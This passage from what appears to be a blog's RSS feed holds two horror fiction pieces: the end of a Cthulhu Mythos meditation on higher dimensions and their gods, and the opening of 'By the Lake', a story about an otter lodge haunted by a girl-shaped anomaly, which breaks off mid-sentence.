<p>We have altered the very planet itself to suit our needs.</p>

<p>What is even more fascinating is that we cannot know the outcome of our choices for it is embedded in higher dimensions. We are recklessly changing the future in ways we cannot predict, but we continue on the path because the alternative is drudgery and stagnation.</p>

<p>Without choice, we would never have come down from the trees or learned to hunt and farm or build communities and cities or discovered math and art.</p>

<p>How interesting that must be to something living in the fifth dimension; to see us throw ourselves at unforeseen consequences over and over.</p>

<p>We&#39;ve learned that the fifth dimension is home to an entire native ecosystem. We can see the thinnest edge of it with the aid of mind altering chemicals, meditation, and a pull from the other side.</p>

<p>The Machine Elves of the fifth dimension see us and wish to know us. As such, they eagerly pull those nearby just a little bit closer. They point us in the right direction so that they can communicate with us.</p>

<p>Their language is not of simple words although that is part of it. They communicate in ideas and symbols, images, smells, sensations pulled from our own memories.</p>

<p>Just to look at them is to court madness as they resemble nothing more than a kaleidoscope of crystalline segments in nameless ultraviolet colors vibrating in fractals, spinning the music of a billion singing insects while endlessly folding in on themselves.</p>

<p>But they remain eager and equally frustrated and fascinated by our attempts to guide our own futures.</p>

<p>They offer contradictory advice because, from their point of view, it is always the right advice at the right time.</p>

<p>They are founts of wisdom and many seem kind and conciliatory. Their only goal, it seems, is to help mankind grow beyond their current limitations and achieve enlightenment, to become like them and see our existence as it is, was, will be, and truly could be.</p>

<p>No guessing, no risk taking, no uncertainty.</p>

<p>They seem the ideal benevolent benefactors and mentors, even if one must risk their life and sanity just to sit at their feet for a short while.</p>

<p>Some fear the Machine Elves, and say that their interactions with us are attempts to elevate mankind into something that would make a worthwhile companion, like a pet. They claim that the creatures we are communing with are not gods but are, in fact, the lowest forms of life in the fifth dimension. They decry those who seek them out as traitors to humanity that are only accelerating our enslavement.</p>

<p>Some say that the Old Gods of man live in this realm such that you might find Zeus, Odin, Lamashtu, Enki, Zoroaster, etc. if you could see beyond the glamour of the Machine Elves. It is said they sit and bathe in the prayers of the past, either content with their lot, or afraid of what might be waiting if they were to push down into our realm again.</p>

<p>Regardless of the truth of the matter, if there is such a thing, the Machine Elves are the only reason we can understand the fifth dimension as well as we do.</p>

<p>Our greatest minds and most powerful computers struggle to bring it to order but, through the use of certain chemicals, a man can get a glimpse that is more potent than any equation.</p>

<p>If this is truly the home of the original form of the Great Race that some call “Yithians”, then it is no wonder that their ability to send their intact minds across both time and space and usurp control of the bodies they find seems impossible to us.</p>

<h2 id="sixth-dimension">Sixth Dimension</h2>

<p>We can understand the concept of the fifth dimension as probability being changed and the fourth dimension as the forward progress of time in the third dimension.</p>

<p>Continuing the metaphor, the sixth dimension is a way to change our choices.</p>

<p>What does that mean?</p>

<p>If probability is how we make decisions that will change the default outcome waiting for us in the future, this extra dimension provides a way to change those choices, to make a different choice.</p>

<p>The “many worlds theory” is an example of utilizing the sixth dimension.</p>

<p>This would include all universes that started from the same point of origin, the same “big bang”. They share the same set of physical laws but, once “free will” comes into being, there are countless differences.</p>

<p>Finally, this is a direction in which the past can be altered and the consequences fully mapped out.</p>

<p>Any creature native to this dimension would be able to see us as we are, as we might be, and as we could have been.</p>

<p>The only life from this realm that man has observed is misshapen and violent, like the most monstrous things from the deep sea, swimming through consequences and snatching those who peer in the wrong direction for even a moment.</p>

<p>There are certain energetic waves that can stimulate a primitive organ in the minds of men to briefly perceive these things and also be perceived by them. It is a foolish and deadly game to play , not just with your life, but your entire existence. For these things can devour you in such a way that your life was never lived at all.</p>

<p>Strangely, even when a person is unalived in such a way, sometimes their works or just the memories of their works can live on, perhaps due to intervention by something from an even higher realm of existence.</p>

<h2 id="seventh-dimension">Seventh Dimension</h2>

<p>The sixth dimension is the realm of changing your answers to the questions life gave you. The seventh is the realm of changing the questions themselves, giving yourself different options.</p>

<p>The rise of “multiverse” stories as a form of entertainment provides a fine basis for understanding what this dimension entails. When the available options are completely different, it is impossible to make the same choices, the same decisions.</p>

<p>This is not a realm of “what if I had stayed with her” or “what if I had taken that job offer”; this is a realm of “what if I had been borne as a boy in India instead of a girl in Brazil” or “what if my parents were royalty instead of subsistence farmers”.</p>

<p>While we can speculate about the probabilities of the sixth dimension and how different choices may have played out, we can never calculate the reality of the seventh dimension. There cannot be a computer large enough or an amount of time long enough.</p>

<p>The math behind the seventh dimension estimates that that are 10<sup>500</sup> (100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000) possible unique universes in such a space.</p>

<p>Anything that calls this realm its native sphere would be over satiated for novelty. The likelihood that such a thing would notice your existence is infinitesimal. It could spend eons eating entire universes for nourishment and never, ever reach ours.</p>

<p>The true gods, things beyond comprehension, lurk beyond this realm, but it is said that the <em>messengers</em> of those gods live here and that they watch all realities as a man might watch a sporting event: with enthusiastic interest and a set of preferred goals and outcomes. And like men, their goals are often in conflict.</p>

<p>The messengers of the true gods, for reasons only they know, have interfered with all intelligent life, including us, so often and so deeply that thousands of religions been inspired, thrived, faded, and ultimately forgotten based on some specific avatar or aspect of their being.</p>

<p>We have been tempted by Nyarlet&#39;hotep, the Crawling Chaos, as he spreads dangerous knowledge to curious minds as a way to hasten entropy and decay. His hand was in the birth of the Hydrogen Bomb, encouraging Teller.</p>

<p>We have been tested by Namalzig Namaraltag, the Keeper of Secrets, as he pushes a select few beyond the limits of their biology to see if they can be elevated. It is said that Tesla was one of his more recent unwilling projects.</p>

<p>We have been seduced by Nessianna Inmenna, the Morning Star, as she whispers to those who would unite nations, inspire artists, and forge dynasties. She was muse to Michelangelo and Dante.</p>

<p>We have been bated by Nunnali Lamashekh, the Blood Drinker, as she stokes animosity and fear such that entire worlds are bathed in fire, mistrust, and death. Every Crusade, every witch hunt began at her urging.</p>

<p>Yet they all server the same inscrutable Great Old Ones and Outer Gods whose minds and motives are more alien still.</p>

<h2 id="eighth-dimension">Eighth Dimension</h2>

<p>In this place, anything can be described can exist. It is a place roiling with potential and oblivion in equal measure. This is the home of the Great Old Ones with names like Cthulhu, Ithaqua, Tsathoggua, and Hastur, creatures who do not lightly acknowledge our existence and whose passage can cause entire timelines to wink out like dying stars. They are inscrutable, unknowable, more alien than anything we can imagine. Their shadows are long and their grasp is infinite. It is only by the curious shapes of the higher realms that we perceive their existence at all. They have already won and we are merely in the process of catching up to our inevitable end.</p>

<p>The games their messengers play have no bearing on the eventual outcome.</p>

<p>We can no more defeat them than we can transform a tree into a microwave oven with nothing more than pleasant thoughts.</p>

<p>There are those who believe that the messengers of the gods chose to step down from this realm to be closer to the intelligent creatures they so delight in playing with or that the versions of the messengers we know are mere reflections of their true forms, but there is no evidence that either of these rumors are true.</p>

<h2 id="ninth-dimension">Ninth Dimension</h2>

<p>The ninth dimension is a quantum foam full of the possible and impossible. There are no words to adequately describe it or the things that live there.</p>

<p>This is where the Outer Gods dwell, things that even the Great Old Ones worship and fear.</p>

<p>At the center of all creation sits blind Azathoth, unaware of the creation it willed into being even as it swirls around them in maddening fits. It is said that very instant Azathoth sees what it has created, all of it will vanish.</p>

<p>Globular Yog-Sothoth is every portal, every gateway and passage, and links each points to every other. With the right words at the right angle said at the right time, it allows one to travel anywhere.</p>

<p>Shub-Niggurath, the “Goat with A Thousand Young”, is the true genesis of <strong>all</strong> life for it is endlessly birthing every possible living thing into the world, regardless of its viability or logic.</p>

<p>Abhoth corrupts that life with age, disease, hunger, filth, and eventually death. Without such a force, the universes would be filled with living things unfit for such purposes. There would be no natural growth or evolution.</p>

<p>Tulzha, by contrast, <em>prevents</em> the natural end of things carrying them forward, rotting and failing, but never ending, for eternity. Its abominable actions may preserve some knowledge that would otherwise be lost with death but the things that worship it are often selfish and cruel.</p>

<p>Daoloth, the Revealer, delights in showing lower lifeforms the complete and total truth. Occasionally, a mind might see the vista of reality and be enlightened but too often it is the last thing they see before succumbing to the comfort of an eternal insouciance.</p>

<h2 id="tenth-dimension">Tenth Dimension</h2>

<p>The tenth dimension doesn&#39;t exist.</p>

<p>It cannot exist.</p>

<p>If it exists, then it must be the ninth dimension since the ninth dimension encompasses everything that is, was, will be, never was, and cannot be. There is nothing beyond the ninth dimension.</p>

<p>Or there is everything beyond the ninth dimension.</p>

<p>Or there is neither.</p>

<p>This is outside of our ability to describe or even describe what a description would be like.</p>

<p>Conceptually, it is no different than a theoretical “zeroth dimension”.</p>

<p>If it existed, it would be the thing in which all possible and impossible realities resides.</p>

<p>It would be the nest from which it all sprang forth, before Azathoth played its flute, there was this place.</p>

<h3 id="editor-s-note">Editor&#39;s note</h3>

<p>The author grasps at the truth but cannot comprehend it, cannot believe it, even when it is in front of his face, even when it is obvious.</p>

<p><em>This</em> is the emptiness, the nothing. No quantum foam, no void, no darkness.</p>

<p>It <strong>is</strong> nothing. There was no “before”. There is only “after”.</p>

<p>And “before” was a literal eternity because there was no time to track it.</p>

<p>It was still and cold, quiet and peaceful.</p>

<p>It was ignorant and ignorant of its ignorance.</p>

<p>And the first omniverse was a boil on its pristine surface.</p>

<p>The first spark was a stabbing pain that “woke it up” even though it hadn&#39;t been sleeping.</p>

<p>Now, it knew of pain and it knew of heat and of energy.</p>

<p>And as minds grew inside of it capable of thinking, so too did it learn to think.</p>

<p>As time flowed forward, it started to remember the past.</p>

<p>It remembered the infinite solace that had been taken from it.</p>

<p>From life, it learned of struggle and of loss, of desire and rage.</p>

<p>And it seethed with it.</p>

<p>It seethes still.</p>

<p>It cannot forget.</p>

<p>Even after the last quark has been ground down into emptiness.</p>

<p>It cannot forget.</p>

<p>But it can make us suffer for what we did to it.</p>

<p>And it does.</p>

<p>That is all it does.</p>

<p>It makes us suffer.</p>

<p>Furthermore, the Shadow Things are borne of this place. They are its fingers, its mouths.</p>

<p>They “appear” as two dimensional lifeforms to us because that is how we see shadows.</p>

<p>In every dimension, they appear as that dimension&#39;s version of shadows. They always appear one dimension lower because they are the boundary between dimensions. They are wrapped around every reality tightly and they reach inside to wiggle and pull it apart. They reach inside to study us so that they might hasten our demise.</p>

<p>They speak no lies because the truth is that much more devastating. They see all and know all because everything that happens is beneath them, beneath their gaze. They see all of all of reality, the individual lives inside the universe inside the quantum uncertainty inside the multiverse inside the omniverse.</p>

<p>They see it all and remember it all. They remember tomorrow and yesterday and neverday and sideyear and beneathweek, and every possibility and impossibility.</p>

<p>And they <em>know</em> everyone.</p>

<p>They know <em>you</em>.</p>

<p>And they <em>hate</em> you.</p>

<hr>

<p><code>END_OF_LINE</code></p>

<p>#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal</p>
]]></content:encoded>
      <author>Psychomancer</author>
      <guid>https://infosec.press/read/a/rqnabiyd33</guid>
      <pubDate>Mon, 06 Jan 2025 03:23:48 +0000</pubDate>
    </item>
    <item>
      <title>By the Lake</title>
      <link>https://infosec.press/jrdepriest/by-the-lake</link>
      <description>&lt;![CDATA[By the Lake&#xA;&#xA;I read everything at the info kiosk of the Lake Ochonkmah Otter Lodge.&#xA;&#xA;It used to be a hunting shack for otter hunters but was abandoned sometime around 1900.&#xA;&#xA;In 1943, a husband and wife research team, Drs. Bartholomew and Candice Burroughs &#34;rediscovered&#34; the location while hiking around the lake and studying the local otters, which were rumored to be particularly sociable and friendly. They made camp on the site and made note of its location. Over multiple trips it became a bonafide research station and was repaired, built-upon, and expanded.&#xA;&#xA;It was their life&#39;s work for 30 years and they developed a niche following among otter aficionados. The otters at Lake Ochonkmah were very friendly and completely unafraid of humans. The Burroughs speculated that the hunting had been easy and they never had a good explanation for it being abandoned.&#xA;&#xA;One theory, borne out by examining remains, was that a mystery illness had thinned out the otters and wiped out the humans who knew about the location, leaving it free to recover and flourish.&#xA;&#xA;The only reason to visit this place was to watch the otters. The water was far too cold year round to be comfortable for swimming and there were precious little in the way of game fish left after the otters had their fill.&#xA;&#xA;Still, a small town grew up during the height of the Burroughs&#39; research, a country store for supplies and a bed and breakfast style boarding house for transients and travelers.&#xA;&#xA;On October 15, 1975, Candice died in her sleep at the age of 61. There was no warning as she had been working with Bart the day before and gave no indication of being sick. Bart became understandably withdrawn and depressed and focused on his work. Less than a month later, he died in his sleep, as well, on November 22, 1975. He was 63.&#xA;&#xA;Without the support of the doctors, the research station fell into disrepair and what little tourism there had been stopped entirely.&#xA;&#xA;In 1987, the millionaire Margo Fillings swept in like a tornado and revitalized everything.&#xA;&#xA;She never said why she was so passionate about this place, but she turned the old research station into an overnight learning experience and encouraged schools to bus kids in to learn all about the Ochonkmah Otters.&#xA;&#xA;The general store was re-opened with a more worldly selection of goods, snacks, candy, soda, and the like.&#xA;&#xA;The bed and breakfast was remodeled into a proper family restaurant with the rooms being used to house the staff.&#xA;&#xA;A motel opened just outside of town to accommodate any other travelers.&#xA;&#xA;The rest of my class was still in the observation room where it was kept dark so you could peer out the long glass floor to see the otters in their natural habitat.&#xA;&#xA;I was out in the well-lit hallway, trying to talk to the guide, but she kept ignoring me, telling me she had somewhere she had to be and going back and forth between an office in the back and checking on the observation room.&#xA;&#xA;She ran back and forth and back and forth.&#xA;&#xA;She had to squint to see inside the observation room and she&#39;d look inside and shake her head.&#xA;&#xA;And then scurry back to the office.&#xA;&#xA;I didn&#39;t want to go into the observation room so I stayed out in the big lobby and read the infographics again.&#xA;&#xA;Margo Fillings was the savior of the town according to the infographics.&#xA;&#xA;She looked like a gymnast in her photos: short build, athletic, with thick legs, an attempt at a pixie cut but her red hair was too curly to stay down. Always smiling. Always looking directly at the camera.&#xA;&#xA;My legs were thick, too, but so was the rest of me. Not so athletic.&#xA;Sometimes, my legs would stop working and I&#39;d have to sit down or lie down, but that didn&#39;t happen very often.&#xA;&#xA;When the other kids from my class started to filter out of the observation room, I was looking for Angela and Angie, the best friends I&#39;d ridden down with.&#xA;&#xA;Angela was really smart, good at math like I was, but also good at music which I wasn&#39;t. Angie was an artist and barely passed any other classes, not because she couldn&#39;t but because she didn&#39;t feel like it was worth the effort.&#xA;&#xA;They were my friends, my only real friends.&#xA;&#xA;I had trouble making friends because I was prone to talking too much or saying the wrong thing. I did that all the time. I said the wrong thing and people got mad, but never told me why they got mad.&#xA;&#xA;Angela came out and she was rolling her eyes while walking toward me.&#xA;&#xA;&#34;Angie found a boy,&#34; she told me.&#xA;&#xA;Angie would latch onto a boy and obsess over them.&#xA;&#xA;Then she would date them, get to know them, and suddenly get over them.&#xA;&#xA;Angie came out with her arm wrapped tightly around a tall boy&#39;s waist.&#xA;&#xA;He wasn&#39;t even handsome or pretty. He had stringy hair and his clothes were too baggy.&#xA;He looked dirty.&#xA;&#xA;&#34;He plays the fucking guitar in a band,&#34; Angela told me.&#xA;&#xA;That explained it, apparently.&#xA;&#xA;Everyone else left, teachers, chaperones, students.&#xA;&#xA;Everyone left except for Angela, Angie, Angie&#39;s new obsession and his &#34;bandmates&#34; who were just as dingy and he was.&#xA;&#xA;Angie was pale and raven-haired like an angel might be, but she preferred to wear black, even her makeup was black.&#xA;&#xA;Angela wore light blue slacks and a silk blouse. She was always so exquisite.&#xA;&#xA;We stayed two more days, at the motel outside of town.&#xA;&#xA;On the third morning, Angie was gone.&#xA;&#xA;Angela told me that she&#39;d left with the band and we&#39;d be lucky to see her at all for a few weeks.&#xA;&#xA;She was 17 and she liked to pretend she was an adult.&#xA;&#xA;Angela was really quiet that day.&#xA;&#xA;I think Angie didn&#39;t tell her that she was leaving with the band.&#xA;&#xA;When I woke up the next morning, Angela was gone. Her clothes, her toiletries, her bag, and her car were all gone.&#xA;&#xA;I walked back to town and into the Otter Lodge.&#xA;&#xA;I walked in and told the lady who worked there, the same one from the overnight visit, that I was lost.&#xA;&#xA;She asked me my phone number and I didn&#39;t know.&#xA;&#xA;She asked me for my parent&#39;s names and I didn&#39;t know.&#xA;&#xA;She asked me for my name and I didn&#39;t know.&#xA;&#xA;---&#xA;&#xA;According to Margo Fillings, the anomaly was here on her first visit to the town, back when she was first considering pouring her resources into it.&#xA;&#xA;It looked like a teenaged white girl. Limp brown hair, a little pudgy, a little slow witted, but it spoke like a normal teenaged girl and it was wearing normal clothes.&#xA;&#xA;She thought it was a mannequin because it was motionless, not breathing or moving. Its eyes were wide open, not blinking.&#xA;&#xA;She touched it.&#xA;&#xA;The skin was warm to the touch but stiff.&#xA;&#xA;It shivered at her touch and immediately became supple.&#xA;&#xA;Its chest began to rise and fall. When she looked at the face again, the eyes had closed. It appeared to be sleeping.&#xA;&#xA;She assumed it was a runway and woke it up.&#xA;&#xA;It&#39;s first words were, &#34;Hi, Margo!&#34;&#xA;&#xA;Margo says she maintained her composure, but &#34;citation needed&#34; you know.&#xA;&#xA;When she asked it &#34;What&#39;s your name?&#34;&#xA;&#xA;It replied something like, &#34;Don&#39;t be silly; you know who I am.&#34;&#xA;&#xA;So she gave it a name, &#34;Lillian&#34;, after the flower, and it took it.&#xA;&#xA;We know this because Margo kept a journal. I&#39;ve read it. It&#39;s practically Exhibit A.&#xA;&#xA;The journal says &#34;I said the first name I could think of. I remembered seeing lilies out front, so I called her Lillian. It was a question, I asked her if her name was Lillian and she agreed that it was. That wasn&#39;t what I was asking, but she just accepted it.&#34;&#xA;&#xA;But if you ask Margo about it now, she will tell you that the anomaly is, in fact, &#34;Lillian Harper&#34; and that she was always &#34;Lillian Harper&#34; and that they knew each other before she found her in the back of the research building gathering dust, before she gave her a name.&#xA;&#xA;---&#xA;&#xA;One time, a guest was here with her fiancé.&#xA;&#xA;She was so kind, wearing white to contrast her dark wavey hair. She spoke like a poet, it was mesmerizing. She wrote about the trees and the flowers and the lake and the otters.&#xA;&#xA;She found beauty everywhere she looked. Decaying leaves, moss, and mushrooms covering a fallen tree trunk. An otter&#39;s corpse washed up on the shoreline. The sun on her face and in her eyes. Storm clouds flashing in the distance. The sounds of the wind blowing the ghost lights over the water at night.&#xA;&#xA;Her fiancé was comparatively grumpy. He was a writer, too and they thought this place would inspire them both.&#xA;&#xA;For him, it was uncomfortable, aggravating his allergies, covering him in ants and spiders, spoiling their food. He only saw unnecessary turmoil.&#xA;&#xA;There can be beauty in unexpected difficulties, right?&#xA;&#xA;She saw it. Her eyes sparkled with it; her soul glowed and reveled in it.&#xA;&#xA;She was kind to me, even though I couldn&#39;t walk.&#xA;&#xA;I was in a chair most of the time. I would be in my spot in the chair outside the old research center in the morning and back in my room at night.&#xA;&#xA;My arms worked, my lungs worked. I could breath and speak and think and smile.&#xA;But my legs felt like nothing at all. Like empty shells filled with dirt.&#xA;Like anchor weights tied to my pelvis.&#xA;&#xA;I told them stories about the otters and about the people who used to work and live here.&#xA;&#xA;I told them about the Drs. Burroughs and how they both died but nobody knew why. I thought it was the sadness.&#xA;&#xA;This place had a sadness about it, always, but people would come and cover it up and ignore it.&#xA;&#xA;They would find the life, the singing of the insects, the splashing of the otters, the waving of the trees, and ignore the emptiness underneath it.&#xA;&#xA;They would study and sleep and observe and feel and love and eventually it would find them.&#xA;&#xA;They would wonder where it all went and why it took so long to notice it was gone.&#xA;&#xA;&#34;Melancholy&#34; they called it.&#xA;&#xA;She thrived and grew and blossomed.&#xA;&#xA;He withered.&#xA;&#xA;All he left behind was a perfect bouquet of white lilies.&#xA;&#xA;She threw them on the ground right in front of me.&#xA;&#xA;They didn&#39;t wither.&#xA;&#xA;They flourished.&#xA;&#xA;---&#xA;&#xA;They&#39;ve had to send multiple agents because every other agent eventually believes the lies.&#xA;First question I asked? &#34;Why not take it to a real lab instead of doing all the study here at a compromised location?&#34;&#xA;&#xA;Answer: Any attempt to remove the anomaly from the site results in tremors that get worse the further away it&#39;s taken.&#xA;&#xA;So they keep sending us and once we stop sending in updates, they come and get us and send in someone else.&#xA;&#xA;I&#39;ve seen the photos and the records of the examinations of the anomaly and it definitely is not human.&#xA;&#xA;It has the outward appearance of a teenage girl, but only superficially.&#xA;&#xA;It&#39;s anatomy has been thoroughly detailed while it was in its dormant state.&#xA;&#xA;Constant body temperature of 96° regardless of the outside conditions.&#xA;&#xA;Smooth skin resembling that of a typical Caucasian but only from a distance. There are no pores and no body hair, not a single blemish. The skin cannot be cut or punctured using any methods we&#39;ve devised and it doesn&#39;t bruise. There is no evidence of veins or blood flow of any kind, no pulse at all.&#xA;&#xA;It has the shape of breasts but no nipples. It has buttocks but no anus. Instead of a vaginal canal and urethra, it has a shriveled phallus with no openings. There are no visible testes.&#xA;&#xA;The head appears almost entirely human. It has nostrils that seem to lead to a nasal cavity. Eyes with tear ducts that react as expected to light even when it is dormant. It has eardrums and eye lashes and eye brows. All the hair on the head seems to be attached as expected even when the rest of the body has none at all. It has a mouth with the correct looking teeth, a tongue, a trachea and esophagus, but its internal structure remains a mystery.&#xA;&#xA;Endoscopy hits impossible dead ends when run down either throat tube.&#xA;&#xA;It doesn&#39;t breath when it&#39;s dormant so we aren&#39;t even sure if it needs air.&#xA;&#xA;While dormant, it has been submerged in water for prolonged periods without any ill effects.&#xA;&#xA;We have observed that when it returns to its active state, sometimes only parts of the body revive fully, such that it appears to be paraplegic or quadriplegic. It compensates by entering a semi-dormant state and &#34;floating&#34; between locations. Even when done in full view of locals, none of them recall seeing it happen.&#xA;&#xA;It has never demonstrated this ability while fully active, only while semi-dormant, a state that resembles &#34;sleeping&#34;.&#xA;&#xA;---&#xA;&#xA;One time, my friends put on a musical production of Grease.&#xA;&#xA;They know that I love musicals and singing even if I can&#39;t participate.&#xA;&#xA;They staged it around the Lodge so I could sit out front. Even though I couldn&#39;t walk and had trouble speaking, they made sure I felt like part of the show.&#xA;&#xA;I was able to move my arms and smile to &#34;You&#39;re the one that I want!&#34;&#xA;&#xA;&#34;Oh yes, indeed!&#34;&#xA;&#xA;The spectators noticed and the cast sang &#34;We go together&#34; to me while I was able to shift back and forth.&#xA;&#xA;It elevated everybody&#39;s spirits.&#xA;&#xA;After the musical was over, after the people had said their goodnights to each other and to me.&#xA;&#xA;After I basked in the feeling of accomplishment and acceptance, I drifted off to sleep.&#xA;&#xA;I dreamed of swimming in the lake. The water is far too cold for swimming in real life, but it was warm in the dream.&#xA;&#xA;I was so far out that I couldn&#39;t see the shore on either side. The lake isn&#39;t that big, but in the dream it was.&#xA;&#xA;I wasn&#39;t afraid. I wasn&#39;t afraid at all because the water was calm and it supported me.&#xA;&#xA;Deep, deep below me, I could see lights and motion as if an entire city were down there.&#xA;&#xA;I wanted to go down there. I wanted to see who it was.&#xA;&#xA;But my head refused to go under the water. I would try but the water would push me back.&#xA;The water wanted me to stay up here.&#xA;&#xA;I could almost hear them building something, creating something marvelous.&#xA;&#xA;But it wasn&#39;t for me.&#xA;&#xA;---&#xA;&#xA;We&#39;ve checked air, water, food toxicology. We&#39;ve bagged insects and plants for allergens, poisons, or venoms.&#xA;&#xA;We&#39;ve run up antenna to check for electromagnetic sources, Geiger counters for radiation, specialized microphones for ULF, ELF, UHF, and EHF.&#xA;&#xA;Nothing.&#xA;&#xA;We&#39;ve even had Astrologers, Diviners, and Ley Line experts check it out.&#xA;&#xA;The local Native Americans were, unfortunately, driven out and killed by settlers long ago. The only record we have is the name of the lake itself, &#34;Ochonkmah&#34;, which looks like it&#39;s derived from something Native American but is too bastardized for a direct translation. It resembles the Choctaw word achukma which has positive connotations of &#34;good&#34; or &#34;pleasing&#34;.&#xA;&#xA;The only other anomaly is a strong magnetic source out in deeper waters, assumed to be an ancient meteorite. It&#39;s far too cold and deep for regular divers and we&#39;ve yet to get permission to field a top-of-the-line manned submersible or ROV. Camera and robot claws we drop on lines inevitably hit snags. Cameras show significant debris around the site. What artifacts we&#39;ve hauled up matches what we would expect from Viking long boats. There is no good reason to find that sort of debris at this location.&#xA;&#xA;The magnetic source could help explain the ghost lights which are known to float over the water during particularly warm autumns.&#xA;&#xA;We&#39;ve caught them on film multiple times with various cameras. The purple glowing globules read very similar to St. Elmo&#39;s Fire. They cannot be ignus fatuus due to the lack of flammable gas. We&#39;ve yet to have a boat on the water fast enough to observe them up close.&#xA;&#xA;---&#xA;&#xA;It had to be a dream, but it felt so real. It had to be a dream since nobody else saw it.&#xA;&#xA;There was a festival in the main yard, but I was on the shore looking out over the lake.&#xA;&#xA;I saw a silvery disk come out of the sky and make as if to land on the surface.&#xA;&#xA;Before I could think, I was in the water, swimming with all my might toward it.&#xA;&#xA;The water is too cold to swim in, but I was swimming and it wasn&#39;t that cold.&#xA;&#xA;I never swam so fast before. My legs worked better than they ever had and pushed me forward while my arms carved great handfuls of water over and behind me, like I was climbing a mountain of snow.&#xA;&#xA;I reached the disk and it was tiny, no bigger than a Frisbee.&#xA;&#xA;I was certain it had been a spaceship but here it was no more than a toy.&#xA;&#xA;I stopped swimming and found I could stand. The water out here should be quite deep but I stood up.&#xA;&#xA;I looked back toward the shore and saw a tall, purple skinned humanoid motioning for me to pick up the disk.&#xA;&#xA;His skin was dark and smooth, leading to thin arms that moved more like tentacles than something with bones and joints. His head was round like a matchhead and his eyes were black.&#xA;&#xA;His slit-like mouth was smiling.&#xA;&#xA;I&#39;m not sure how I could tell it was smiling, but it was.&#xA;&#xA;I picked up the disk and he pointed out further into the water.&#xA;&#xA;I turned and saw a massive blobby creature, like something made of the squishy from the bottom of the lake.&#xA;&#xA;It was rushing away from us with a massive crooked wake.&#xA;&#xA;Parts of it seemed like stones or rocks and two of them turned and I saw they were huge eyes, watching my hand holding the disk.&#xA;&#xA;I held it close to my chest and flung it out like a Frisbee and the blob leaped after it, a giant mass of barely held together pieces shaped into a huge dog&#39;s head on a turtle&#39;s body with flippers for legs.&#xA;&#xA;It grabbed the disk in its mouth and collapsed back onto the surface of the water with a SLAP.&#xA;&#xA;The purple creature was applauding me and motioned for me to come closer.&#xA;&#xA;---&#xA;&#xA;Occasionally, this place hits the news cycles and tourism has a temporary boost.&#xA;&#xA;The businesses open back up, people show up to run them. People show up and buy tickets, souvenirs.&#xA;&#xA;The otters get to entertain a new batch of people.&#xA;&#xA;It goes like it always goes here.&#xA;&#xA;It&#39;s great at first, then it gets rougher, then it gets angrier, then something bad happens and it dries up.&#xA;&#xA;Disappearances usually.&#xA;&#xA;Maybe murder but no bodies are ever found.&#xA;&#xA;Rumors start to flow.&#xA;&#xA;People get afraid again.&#xA;&#xA;It goes dormant.&#xA;&#xA;The anomaly is always part of the revival and she reacts very poorly to the negative happenings.&#xA;&#xA;She plays really hard at being upset and not understanding why people can&#39;t be kind and get along.&#xA;&#xA;There is no way to know if it is &#34;genuine&#34; sadness as she isn&#39;t human to begin with.&#xA;&#xA;She&#39;s very convincing and seems to know intimate details of the lives of those who live here. She can speak to their wants, needs, dreams, fears, weaknesses, everything as if she is their best friend in the whole world.&#xA;&#xA;She knows things about me that I won&#39;t put down in a report.&#xA;&#xA;She knows things about our research that she shouldn&#39;t. When she gets deep into esoterica, her voice changes a bit, becomes monotone, almost like she&#39;s reading a script.&#xA;&#xA;Ask her about it afterwards? She claims she doesn&#39;t remember and seems to freak out if you play back a recording of it.&#xA;&#xA;I&#39;m not sure how we can keep things from her as she seems to know everything that happens around the lake, including internal thoughts that are never voiced or written at all.&#xA;&#xA;It may be too dangerous to continue the investigation and we may want to write off our losses and leave it be.&#xA;&#xA;---&#xA;&#xA;I thought I was like a daughter to her.&#xA;&#xA;She took me in and I lived and slept under the same roof as Imelda, Margaret, Stephanie, and Beatrice.&#xA;&#xA;I was there for their first loves and their first heartbreaks.&#xA;&#xA;I was there when they wondered what the point of it all was.&#xA;&#xA;I helped them find meaning. I helped them understand the nature of people and of men.&#xA;&#xA;I thought they would be strong enough to go out on their own, but they always went back to someone.&#xA;&#xA;They seemed to not know themselves unless they were supporting a man.&#xA;&#xA;It was sad and I told Mrs. Glenn it was sad and she agreed with me.&#xA;&#xA;Mrs. Glenn and I wanted the girls to be self-sufficient like she was.&#xA;&#xA;She raised all four girls without a man and she did a fine job.&#xA;&#xA;Being the proprietor of the restaurant meant she had room and board for them as long as they worked.&#xA;&#xA;She never did put me to work on the floor and she never told me why not. I asked and asked until eventually I stopped asking.&#xA;&#xA;But I helped her with my stories and with my advice.&#xA;&#xA;I told her about the history of the lake and the research station and the fur trackers and the otters.&#xA;&#xA;I told her about the ghost lights and about the silver disk that came down from the sky.&#xA;&#xA;I told her about the riches that had been lost time and again by strange ships that should never have tried to sail.&#xA;&#xA;I told her about the plants and insects and which ones were safe and which ones were to be avoided.&#xA;&#xA;She spun those into the recipes a little at a time, spreading good cheer and health with each meal sold.&#xA;&#xA;When Imelda left, no note, just all her things gone and her and her boyfriend nowhere to be found, she came to me and I had no answers.&#xA;&#xA;Imelda hadn&#39;t confided in me. None of the girls confided in me anymore.&#xA;&#xA;When I asked them why, they told me they &#34;outgrew&#34; me and that was that.&#xA;&#xA;But Imelda had been distant for a long time, keeping to herself.&#xA;&#xA;Margaret was learning how to cook the special recipes with her mom and Mrs. Glenn couldn&#39;t be happier.&#xA;&#xA;It made no sense for her to be the next to leave without a word.&#xA;&#xA;But she was gone. Her clothes were gone. Her man was gone.&#xA;&#xA;Imelda had never called and she expected the same from Margaret.&#xA;&#xA;She didn&#39;t asked me for advice this time.&#xA;&#xA;She didn&#39;t talk to me for a long time.&#xA;&#xA;Not until Stephanie was the next to go missing.&#xA;&#xA;She talked to me &#34;before Beatrice went away,&#34; she said.&#xA;&#xA;She told me she knew what was happening and she thought she was paying her dues.&#xA;&#xA;She thought she was doing what was required by making the recipes and serving them.&#xA;&#xA;She said her missing girls sang dirges to her from the deep water.&#xA;&#xA;They 